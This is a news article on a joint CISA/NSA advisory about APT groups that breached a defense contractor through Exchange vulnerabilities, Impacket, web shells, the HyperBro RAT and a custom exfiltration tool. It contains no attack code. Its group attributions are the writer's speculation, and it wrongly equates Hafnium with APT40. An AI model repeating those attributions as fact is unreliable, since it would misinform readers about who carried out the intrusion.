The Cybersecurity and Infrastructure Security Agency (CISA) and the Nation Security Agency (NSA) issued a joint cybersecurity advisory on multiple advanced persistent threat (APT) groups that compromised a Defense Industrial Base (DIB) sector organization and exfiltrated sensitive data.
CISA and a third-party incident response firm Mandiant responded to a network security incident between November 2021 and January 2022. Both response teams discovered a threat actor on the victim’s network. The federal security agency also discovered that multiple threat actors had access to the victim’s environment, with possible long-term persistence.
“During incident response activities, CISA uncovered that likely multiple APT groups compromised the organization’s network, and some APT actors had long–term access to the environment,” the cybersecurity advisory warned.
Subsequently, CISA and NSA published a joint advisory with indicators of compromise and possible mitigations.
APT groups used open-source tools to compromise a defense organization
CISA stated that the threat actors leveraged an open-source toolkit called Impacket, a python tool for manipulating network protocols, maintaining persistence, and attempting to move laterally. Impacket uses Windows Management Instrumentation (WMI) and Server Message Block (SMB) protocols to create a semi-interactive shell capable of running commands remotely.
The hackers also used Impacket to access privileged service accounts, which they used to access the organization’s Microsoft Exchange server via the Outlook Web Access (OWA) client. Four hours after compromising the environment, the attackers performed mailbox searches and accessed the Exchange Web Services API.
Additionally, the attackers used a custom data exfiltration tool CovalentStealer, to exfiltrate sensitive data. CovalentStealer can detect network shares, target files using paths, and upload stolen documents to a remote server.
According to the cybersecurity advisory, the hackers stole contract-related information, company emails, meetings, and contacts.
Microsoft Exchange Server vulnerabilities at play
In early March 2021, the APT actors exploited vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to install 17 China Chopper web shells.
The breach’s timeline coincides with the peak exploitation of Microsoft Exchange Server ProxyLogon vulnerability CVE-2021-26855.
Later in March 2021, the attackers installed the HyperBro remote access trojan (RAT) to create backdoors. HyperBro backdoor can download and upload files from a compromised system, log keystrokes, and execute commands on the system.
Multiple nation-state APT groups accessed a defense company’s environment
The security agencies did not implicate any particular hacking group but suggested that multiple APT groups had access.
Chinese hackers Hafnium (APT40) were the main culprits in the exploitation of ProxyLogon CVE-2021-26855, which was also exploited during the attack on the defense organization. Emissary Panda (APT27, Lucky Mouse, Bronze Union, and Budworm) had deployed HyperBro RAT against German commercial organizations in early 2022. Since multiple APT groups were involved, both APT27 and APT40 were likely involved. Other less-likely APT groups include Iranian PHOSPHORUS or DEV-0270 and North Korea’s LAZARUS APT, which leverage Impacket.
“The national security implications of this espionage campaign are significant,” said Tom Kellermann, senior vice president of cyber strategy at Contrast Security. “The Chinese threat actor behind this intrusion represents their ‘A team.’ With tensions simmering over Taiwan, we presume more of these infiltrations are occurring.”
Kellermann suggested that the APT groups could island-hop from the defense company into the military.
“Expanded threat hunting across Microsoft exchange servers and their administrators’ endpoints are imperative,” he added. “My biggest concern is whether the integrity of the data was manipulated post-exploitation.”
Hackers compromised defense company using an ex-employee’s account
The joint advisory also disclosed that the attackers used valid credentials to access the compromised systems since mid-January 2022.
One account used to access Exchange Web Services (EWS) belonged to a former employee. However, CISA did not disclose how the attackers obtained the credentials.
The threat actors used virtual private networks (VPNs) and virtual private servers from M247 and SurfShark to access the Exchange Server. CISA noted that cybercriminals frequently use these providers for their ability to hide interactions between the attackers and the victims’ networks.
Terry Olaes, Director of Sales Engineering at Skybox Security, said the alert was a reminder to include infrastructure devices in vulnerability management programs.
“Security teams need to quickly assess vulnerability risk posed across both endpoint and infrastructure assets without waiting for other teams, such as platform and network functions, to provide feedback,” he concluded.